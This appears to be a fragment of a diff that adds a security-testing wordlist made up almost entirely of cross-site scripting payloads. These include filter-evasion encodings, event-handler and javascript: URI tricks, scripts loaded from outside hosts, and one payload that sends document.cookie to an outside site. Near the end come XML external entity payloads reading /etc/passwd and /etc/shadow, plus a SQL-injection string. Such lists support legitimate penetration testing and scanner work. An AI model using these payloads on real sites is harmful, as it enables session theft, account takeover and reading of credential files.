+ <head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-
2365
+ <a href="javascript#document.vulnerable=true;">
2366
+ <div onmouseover="document.vulnerable=true;">
2367
+ <img src="javascript:document.vulnerable=true;">
2368
+ <img dynsrc="javascript:document.vulnerable=true;">
2369
+ <input type="image" dynsrc="javascript:document.vulnerable=true;">
2370
+ <bgsound src="javascript:document.vulnerable=true;">
2371
+ &<script>document.vulnerable=true;</script>
2372
+ &{document.vulnerable=true;};
2373
+ <img src=&{document.vulnerable=true;};>
2374
+ <link rel="stylesheet" href="javascript:document.vulnerable=true;">
2375
+ <iframe src="vbscript:document.vulnerable=true;">
2376
+ <img src="mocha:document.vulnerable=true;">
2377
+ <img src="livescript:document.vulnerable=true;">
2378
+ <a href="about:<script>document.vulnerable=true;</script>">
2379
+ <meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">
2380
+ <body onload="document.vulnerable=true;">
2381
+ <div style="background-image: url(javascript:document.vulnerable=true;);">
2382
+ <div style="behaviour: url([link to code]);">
2383
+ <div style="binding: url([link to code]);">
2384
+ <div style="width: expression(document.vulnerable=true;);">
2385
+ <style type="text/javascript">document.vulnerable=true;</style>
2386
+ <object classid="clsid:..." codebase="javascript:document.vulnerable=true;">
2387
+ <style><!--</style><script>document.vulnerable=true;//--></script>
2388
+ <<script>document.vulnerable=true;</script>
2389
+ <![<!--]]<script>document.vulnerable=true;//--></script>
2390
+ <!-- -- --><script>document.vulnerable=true;</script><!-- -- -->
2391
+ <img src="blah"onmouseover="document.vulnerable=true;">
2392
+ <img src="blah>" onmouseover="document.vulnerable=true;">
2393
+ <xml src="javascript:document.vulnerable=true;">
2394
+ <xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>
2395
+ <div datafld="b" dataformatas="html" datasrc="#X"></div>
2396
+ [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>
2397
+ <style>@import'http://www.securitycompass.com/xss.css';</style>
2398
+ <meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet">
2399
+ <style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style>
2400
+ <OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object>
2401
+ <HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html>
2402
+ <script SRC="http://www.securitycompass.com/xss.jpg"></script>
2403
+ <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"-->
2404
+ <script a=">" SRC="http://www.securitycompass.com/xss.js"></script>
2405
+ <script =">" SRC="http://www.securitycompass.com/xss.js"></script>
2406
+ <script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script>
2407
+ <script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script>
2408
+ <script a=`>` SRC="http://www.securitycompass.com/xss.js"></script>
2409
+ <script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script>
2410
+ <script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script>
2411
+ <div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla]
2412
+ &quot;&gt;&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(&quot;XSS&quot;)&gt;
2413
+ &lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;
2414
+ &lt;/br style=a:expression(alert())&gt;
2415
+ &lt;scrscriptipt&gt;alert(1)&lt;/scrscriptipt&gt;
2416
+ &lt;br size=\&quot;&amp;{alert(&#039;XSS&#039;)}\&quot;&gt;
2417
+ perl -e &#039;print \&quot;&lt;IMG SRC=java\0script:alert(\&quot;XSS\&quot;)&gt;\&quot;;&#039; &gt; out
2418
+ perl -e &#039;print \&quot;&lt;SCR\0IPT&gt;alert(\&quot;XSS\&quot;)&lt;/SCR\0IPT&gt;\&quot;;&#039; &gt; out
2419
+ <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
2420
+ <~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)>
2421
+ <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
2422
+ <~/XSS STYLE=xss:expression(alert('XSS'))>
2423
+ "><script>alert('XSS')</script>
2424
+ </XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
2425
+ XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
2426
+ XSS STYLE=xss:e/**/xpression(alert('XSS'))>
2427
+ </XSS STYLE=xss:expression(alert('XSS'))>
2428
+ ';;alert(String.fromCharCode(88,83,83))//\';;alert(String.fromCharCode(88,83,83))//";;alert(String.fromCharCode(88,83,83))//\";;alert(String.fromCharCode(88,83,83))//-->;<;/SCRIPT>;";>;';>;<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;
2429
+ ';';;!--";<;XSS>;=&;{()}
2430
+ <;SCRIPT>;alert(';XSS';)<;/SCRIPT>;
2431
+ <;SCRIPT SRC=http://ha.ckers.org/xss.js>;<;/SCRIPT>;
2432
+ <;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;
2433
+ <;BASE HREF=";javascript:alert(';XSS';);//";>;
2434
+ <;BGSOUND SRC=";javascript:alert(';XSS';);";>;
2435
+ <;BODY BACKGROUND=";javascript:alert(';XSS';);";>;
2436
+ <;BODY ONLOAD=alert(';XSS';)>;
2437
+ <;DIV STYLE=";background-image: url(javascript:alert(';XSS';))";>;
2438
+ <;DIV STYLE=";background-image: url(&;#1;javascript:alert(';XSS';))";>;
2439
+ <;DIV STYLE=";width: expression(alert(';XSS';));";>;
2440
+ <;FRAMESET>;<;FRAME SRC=";javascript:alert(';XSS';);";>;<;/FRAMESET>;
2441
+ <;IFRAME SRC=";javascript:alert(';XSS';);";>;<;/IFRAME>;
2442
+ <;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(';XSS';);";>;
2443
+ <;IMG SRC=";javascript:alert(';XSS';);";>;
2444
+ <;IMG SRC=javascript:alert(';XSS';)>;
2445
+ <;IMG DYNSRC=";javascript:alert(';XSS';);";>;
2446
+ <;IMG LOWSRC=";javascript:alert(';XSS';);";>;
2447
+ <;IMG SRC=";http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode";>;
2448
+ Redirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser
2449
+ exp/*<;XSS STYLE=';no\xss:noxss(";*//*";);
2450
+ <;STYLE>;li {list-style-image: url(";javascript:alert(&#39;XSS&#39;)";);}<;/STYLE>;<;UL>;<;LI>;XSS
2451
+ <;IMG SRC=';vbscript:msgbox(";XSS";)';>;
2452
+ <;LAYER SRC=";http://ha.ckers.org/scriptlet.html";>;<;/LAYER>;
2453
+ <;IMG SRC=";livescript:[code]";>;
2454
+ %BCscript%BEalert(%A2XSS%A2)%BC/script%BE
2455
+ <;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(';XSS';);";>;
2456
+ <;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K";>;
2457
+ <;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:alert(';XSS';);";>;
2458
+ <;IMG SRC=";mocha:[code]";>;
2459
+ <;OBJECT TYPE=";text/x-scriptlet"; DATA=";http://ha.ckers.org/scriptlet.html";>;<;/OBJECT>;
2460
+ <;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(';XSS';)>;<;/OBJECT>;
2461
+ <;EMBED SRC=";http://ha.ckers.org/xss.swf"; AllowScriptAccess=";always";>;<;/EMBED>;
2462
+ a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(';XSS';);";)";;&#10;eval(a+b+c+d);
2463
+ <;STYLE TYPE=";text/javascript";>;alert(';XSS';);<;/STYLE>;
2464
+ <;IMG STYLE=";xss:expr/*XSS*/ession(alert(';XSS';))";>;
2465
+ <;XSS STYLE=";xss:expression(alert(';XSS';))";>;
2466
+ <;STYLE>;.XSS{background-image:url(";javascript:alert(';XSS';)";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>;
2467
+ <;STYLE type=";text/css";>;BODY{background:url(";javascript:alert(';XSS';)";)}<;/STYLE>;
2468
+ <;LINK REL=";stylesheet"; HREF=";javascript:alert(';XSS';);";>;
2469
+ <;LINK REL=";stylesheet"; HREF=";http://ha.ckers.org/xss.css";>;
2470
+ <;STYLE>;@import';http://ha.ckers.org/xss.css';;<;/STYLE>;
2471
+ <;META HTTP-EQUIV=";Link"; Content=";<;http://ha.ckers.org/xss.css>;; REL=stylesheet";>;
2472
+ <;STYLE>;BODY{-moz-binding:url(";http://ha.ckers.org/xssmoz.xml#xss";)}<;/STYLE>;
2473
+ <;TABLE BACKGROUND=";javascript:alert(';XSS';)";>;<;/TABLE>;
2474
+ <;TABLE>;<;TD BACKGROUND=";javascript:alert(';XSS';)";>;<;/TD>;<;/TABLE>;
2475
+ <;HTML xmlns:xss>;
2476
+ <;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=";javas]]>;<;![CDATA[cript:alert(';XSS';);";>;]]>;
2477
+ <;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!-- -->;cript:alert(';XSS';)";>;<;/B>;<;/I>;<;/XML>;
2478
+ <;XML SRC=";http://ha.ckers.org/xsstest.xml"; ID=I>;<;/XML>;
2479
+ <;HTML>;<;BODY>;
2480
+ <;!--[if gte IE 4]>;
2481
+ <;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;";>;
2482
+ <;XSS STYLE=";behavior: url(http://ha.ckers.org/xss.htc);";>;
2483
+ <;SCRIPT SRC=";http://ha.ckers.org/xss.jpg";>;<;/SCRIPT>;
2484
+ <;!--#exec cmd=";/bin/echo ';<;SCRIPT SRC';";-->;<;!--#exec cmd=";/bin/echo ';=http://ha.ckers.org/xss.js>;<;/SCRIPT>;';";-->;
2485
+ <;? echo(';<;SCR)';;
2486
+ <;BR SIZE=";&;{alert(';XSS';)}";>;
2487
+ <;IMG SRC=JaVaScRiPt:alert(';XSS';)>;
2488
+ <;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>;
2489
+ <;IMG SRC=`javascript:alert(";RSnake says, ';XSS';";)`>;
2490
+ <;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>;
2491
+ <;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;>;
2492
+ <;IMG RC=&;#0000106&;#0000097&;#0000118&;#0000097&;#0000115&;#0000099&;#0000114&;#0000105&;#0000112&;#0000116&;#0000058&;#0000097&;#0000108&;#0000101&;#0000114&;#0000116&;#0000040&;#0000039&;#0000088&;#0000083&;#0000083&;#0000039&;#0000041>;
2493
+ <;DIV STYLE=";background-image:\0075\0072\006C\0028';\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.10530053\0027\0029';\0029";>;
2494
+ <;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x72&;#x69&;#x70&;#x74&;#x3A&;#x61&;#x6C&;#x65&;#x72&;#x74&;#x28&;#x27&;#x58&;#x53&;#x53&;#x27&;#x29>;
2495
+ <;HEAD>;<;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4-
2496
+ \";;alert(';XSS';);//
2497
+ <;/TITLE>;<;SCRIPT>;alert("XSS");<;/SCRIPT>;
2498
+ <;STYLE>;@im\port';\ja\vasc\ript:alert(";XSS";)';;<;/STYLE>;
2499
+ <;IMG SRC=";jav&#x09;ascript:alert(';XSS';);";>;
2500
+ <;IMG SRC=";jav&;#x09;ascript:alert(';XSS';);";>;
2501
+ <;IMG SRC=";jav&;#x0A;ascript:alert(';XSS';);";>;
2502
+ <;IMG SRC=";jav&;#x0D;ascript:alert(';XSS';);";>;
2503
+ <;IMG&#x0D;SRC&#x0D;=&#x0D;";&#x0D;j&#x0D;a&#x0D;v&#x0D;a&#x0D;s&#x0D;c&#x0D;r&#x0D;i&#x0D;p&#x0D;t&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;&#x0D;';&#x0D;X&#x0D;S&#x0D;S&#x0D;';&#x0D;)&#x0D;";&#x0D;>;&#x0D;
2504
+ perl -e ';print ";<;IM SRC=java\0script:alert(";XSS";)>";;';>; out
2505
+ perl -e ';print ";&;<;SCR\0IPT>;alert(";XSS";)<;/SCR\0IPT>;";;'; >; out
2506
+ <;IMG SRC="; &;#14; javascript:alert(';XSS';);";>;
2507
+ <;SCRIPT/XSS SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
2508
+ <;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>;
2509
+ <;SCRIPT SRC=http://ha.ckers.org/xss.js
2510
+ <;SCRIPT SRC=//ha.ckers.org/.j>;
2511
+ <;IMG SRC=";javascript:alert(';XSS';)";
2512
+ <;IFRAME SRC=http://ha.ckers.org/scriptlet.html <;
2513
+ <;<;SCRIPT>;alert(";XSS";);//<;<;/SCRIPT>;
2514
+ <;IMG ";";";>;<;SCRIPT>;alert(";XSS";)<;/SCRIPT>;";>;
2515
+ <;SCRIPT>;a=/XSS/
2516
+ <;SCRIPT a=";>;"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
2517
+ <;SCRIPT =";blah"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
2518
+ <;SCRIPT a=";blah"; ';'; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
2519
+ <;SCRIPT ";a=';>;';"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
2520
+ <;SCRIPT a=`>;` SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
2521
+ <;SCRIPT>;document.write(";<;SCRI";);<;/SCRIPT>;PT SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
2522
+ <;SCRIPT a=";>';>"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
2523
+ <;A HREF=";http://66.102.7.147/";>;XSS<;/A>;
2524
+ <;A HREF=";http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D";>;XSS<;/A>;
2525
+ <;A HREF=";http://1113982867/";>;XSS<;/A>;
2526
+ <;A HREF=";http://0x42.0x0000066.0x7.0x93/";>;XSS<;/A>;
2527
+ <;A HREF=";http://0102.0146.0007.00000223/";>;XSS<;/A>;
2528
+ <;A HREF=";h&#x0A;tt&#09;p://6&;#09;6.000146.0x7.147/";>;XSS<;/A>;
2529
+ <;A HREF=";//www.google.com/";>;XSS<;/A>;
2530
+ <;A HREF=";//google";>;XSS<;/A>;
2531
+ <;A HREF=";http://ha.ckers.org@google";>;XSS<;/A>;
2532
+ <;A HREF=";http://google:ha.ckers.org";>;XSS<;/A>;
2533
+ <;A HREF=";http://google.com/";>;XSS<;/A>;
2534
+ <;A HREF=";http://www.google.com./";>;XSS<;/A>;
2535
+ <;A HREF=";javascript:document.location=';http://www.google.com/';";>;XSS<;/A>;
2536
+ <;A HREF=";http://www.gohttp://www.google.com/ogle.com/";>;XSS<;/A>;
2537
+ <script>document.vulnerable=true;</script>
2538
+ <img SRC="jav ascript:document.vulnerable=true;">
2539
+ <img SRC="javascript:document.vulnerable=true;">
2540
+ <img SRC=" &#14; javascript:document.vulnerable=true;">
2541
+ <body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>
2542
+ <<SCRIPT>document.vulnerable=true;//<</SCRIPT>
2543
+ <script <B>document.vulnerable=true;</script>
2544
+ <img SRC="javascript:document.vulnerable=true;"
2545
+ <iframe src="javascript:document.vulnerable=true; <
2546
+ <script>a=/XSS/\ndocument.vulnerable=true;</script>
2547
+ \";document.vulnerable=true;;//
2548
+ </title><SCRIPT>document.vulnerable=true;</script>
2549
+ <input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;">
2550
+ <body BACKGROUND="javascript:document.vulnerable=true;">
2551
+ <body ONLOAD=document.vulnerable=true;>
2552
+ <img DYNSRC="javascript:document.vulnerable=true;">
2553
+ <img LOWSRC="javascript:document.vulnerable=true;">
2554
+ <bgsound SRC="javascript:document.vulnerable=true;">
2555
+ <br SIZE="&{document.vulnerable=true}">
2556
+ <LAYER SRC="javascript:document.vulnerable=true;"></LAYER>
2557
+ <link REL="stylesheet" HREF="javascript:document.vulnerable=true;">
2558
+ <style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS
2559
+ <img SRC='vbscript:document.vulnerable=true;'>
2560
+ 1script3document.vulnerable=true;1/script3
2561
+ <meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;">
2562
+ <meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;">
2563
+ <IFRAME SRC="javascript:document.vulnerable=true;"></iframe>
2564
+ <FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset>
2565
+ <table BACKGROUND="javascript:document.vulnerable=true;">
2566
+ <table><TD BACKGROUND="javascript:document.vulnerable=true;">
2567
+ <div STYLE="background-image: url(javascript:document.vulnerable=true;)">
2568
+ <div STYLE="background-image: url(&#1;javascript:document.vulnerable=true;)">
2569
+ <div STYLE="width: expression(document.vulnerable=true);">
2570
+ <style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style>
2571
+ <img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)">
2572
+ <XSS STYLE="xss:expression(document.vulnerable=true)">
2573
+ exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'>
2574
+ <style TYPE="text/javascript">document.vulnerable=true;</style>
2575
+ <style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a>
2576
+ <style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style>
2577
+ <!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]-->
2578
+ <base HREF="javascript:document.vulnerable=true;//">
2579
+ <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object>
2580
+ <XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span>
2581
+ <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span>
2582
+ <html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html>
2583
+ <? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>
2584
+ <meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>">
2585
+ <head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-
2586
+ <a href="javascript#document.vulnerable=true;">
2587
+ <div onmouseover="document.vulnerable=true;">
2588
+ <img src="javascript:document.vulnerable=true;">
2589
+ <img dynsrc="javascript:document.vulnerable=true;">
2590
+ <input type="image" dynsrc="javascript:document.vulnerable=true;">
2591
+ <bgsound src="javascript:document.vulnerable=true;">
2592
+ &<script>document.vulnerable=true;</script>
2593
+ &{document.vulnerable=true;};
2594
+ <img src=&{document.vulnerable=true;};>
2595
+ <link rel="stylesheet" href="javascript:document.vulnerable=true;">
2596
+ <iframe src="vbscript:document.vulnerable=true;">
2597
+ <img src="mocha:document.vulnerable=true;">
2598
+ <img src="livescript:document.vulnerable=true;">
2599
+ <a href="about:<script>document.vulnerable=true;</script>">
2600
+ <meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">
2601
+ <body onload="document.vulnerable=true;">
2602
+ <div style="background-image: url(javascript:document.vulnerable=true;);">
2603
+ <div style="behaviour: url([link to code]);">
2604
+ <div style="binding: url([link to code]);">
2605
+ <div style="width: expression(document.vulnerable=true;);">
2606
+ <style type="text/javascript">document.vulnerable=true;</style>
2607
+ <object classid="clsid:..." codebase="javascript:document.vulnerable=true;">
2608
+ <style><!--</style><script>document.vulnerable=true;//--></script>
2609
+ <<script>document.vulnerable=true;</script>
2610
+ <![<!--]]<script>document.vulnerable=true;//--></script>
2611
+ <!-- -- --><script>document.vulnerable=true;</script><!-- -- -->
2612
+ <img src="blah"onmouseover="document.vulnerable=true;">
2613
+ <img src="blah>" onmouseover="document.vulnerable=true;">
2614
+ <xml src="javascript:document.vulnerable=true;">
2615
+ <xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>
2616
+ <div datafld="b" dataformatas="html" datasrc="#X"></div>
2617
+ [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>
2618
+ <style>@import'http://www.securitycompass.com/xss.css';</style>
2619
+ <meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet">
2620
+ <style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style>
2621
+ <OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object>
2622
+ <HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html>
2623
+ <script SRC="http://www.securitycompass.com/xss.jpg"></script>
2624
+ <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"-->
2625
+ <script a=">" SRC="http://www.securitycompass.com/xss.js"></script>
2626
+ <script =">" SRC="http://www.securitycompass.com/xss.js"></script>
2627
+ <script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script>
2628
+ <script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script>
2629
+ <script a=`>` SRC="http://www.securitycompass.com/xss.js"></script>
2630
+ <script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script>
2631
+ <script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script>
2632
+ <div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla]
2633
+ ";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>;
2634
+ <;/script>;<;script>;alert(1)<;/script>;
2635
+ <;/br style=a:expression(alert())>;
2636
+ <;scrscriptipt>;alert(1)<;/scrscriptipt>;
2637
+ <;br size=\";&;{alert(&#039;XSS&#039;)}\";>;
2638
+ perl -e &#039;print \";<;IMG SRC=java\0script:alert(\";XSS\";)>;\";;&#039; >; out
2639
+ perl -e &#039;print \";<;SCR\0IPT>;alert(\";XSS\";)<;/SCR\0IPT>;\";;&#039; >; out
2640
+ <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
2641
+ <~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)>
2642
+ <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
2643
+ <~/XSS STYLE=xss:expression(alert('XSS'))>
2644
+ "><script>alert('XSS')</script>
2645
+ </XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
2646
+ XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
2647
+ XSS STYLE=xss:e/**/xpression(alert('XSS'))>
2648
+ </XSS STYLE=xss:expression(alert('XSS'))>
2649
+ >"><script>alert("XSS")</script>&
2650
+ "><STYLE>@import"javascript:alert('XSS')";</STYLE>
2651
+ >"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
2652
+ >%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22>
2653
+ '%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'
2654
+ '';!--"<XSS>=&{()}
2655
+ <IMG SRC="javascript:alert('XSS');">
2656
+ <IMG SRC=javascript:alert('XSS')>
2657
+ <IMG SRC=JaVaScRiPt:alert('XSS')>
2658
+ <IMG SRC=JaVaScRiPt:alert(&quot;XSS<WBR>&quot;)>
2659
+ <IMGSRC=&#106;&#97;&#118;&#97;&<WBR>#115;&#99;&#114;&#105;&#112;&<WBR>#116;&#58;&#97;&#108;&#101;&<WBR>#114;&#116;&#40;&#39;&#88;&#83<WBR>;&#83;&#39;&#41>
2660
+ <IMGSRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041>
2661
+ <IMGSRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28&<WBR>#x27&#x58&#x53&#x53&#x27&#x29>
2662
+ <IMG SRC="jav&#x0A;ascript:alert(<WBR>'XSS');">
2663
+ <IMG SRC="jav&#x0D;ascript:alert(<WBR>'XSS');">
2664
+ <![CDATA[<script>var n=0;while(true){n++;}</script>]]>
2665
+ <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
2666
+ <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof>
2667
+ <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo>
2668
+ <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo>
2669
+ <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo>
2670
+ <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo>
2671
+ <script>alert('XSS')</script>
2672
+ %3cscript%3ealert('XSS')%3c/script%3e
2673
+ %22%3e%3cscript%3ealert('XSS')%3c/script%3e
2674
+ <IMG SRC="javascript:alert('XSS');">
2675
+ <IMG SRC=javascript:alert(&quot;XSS&quot;)>
2676
+ <IMG SRC=javascript:alert('XSS')>
2677
+ <img src=xss onerror=alert(1)>
2678
+ <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
2679
+ <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
2680
+ <IMG SRC="jav ascript:alert('XSS');">
2681
+ <IMG SRC="jav&#x09;ascript:alert('XSS');">
2682
+ <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
2683
+ <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
2684
+ <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
2685
+ <BODY BACKGROUND="javascript:alert('XSS')">
2686
+ <BODY ONLOAD=alert('XSS')>
2687
+ <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
2688
+ <IMG SRC="javascript:alert('XSS')"
2689
+ <iframe src=http://ha.ckers.org/scriptlet.html <
2690
+ <<SCRIPT>alert("XSS");//<</SCRIPT>
2691
+ %253cscript%253ealert(1)%253c/script%253e
2692
+ "><s"%2b"cript>alert(document.cookie)</script>
2693
+ foo<script>alert(1)</script>
2694
+ <scr<script>ipt>alert(1)</scr</script>ipt>
2695
+ <SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
2696
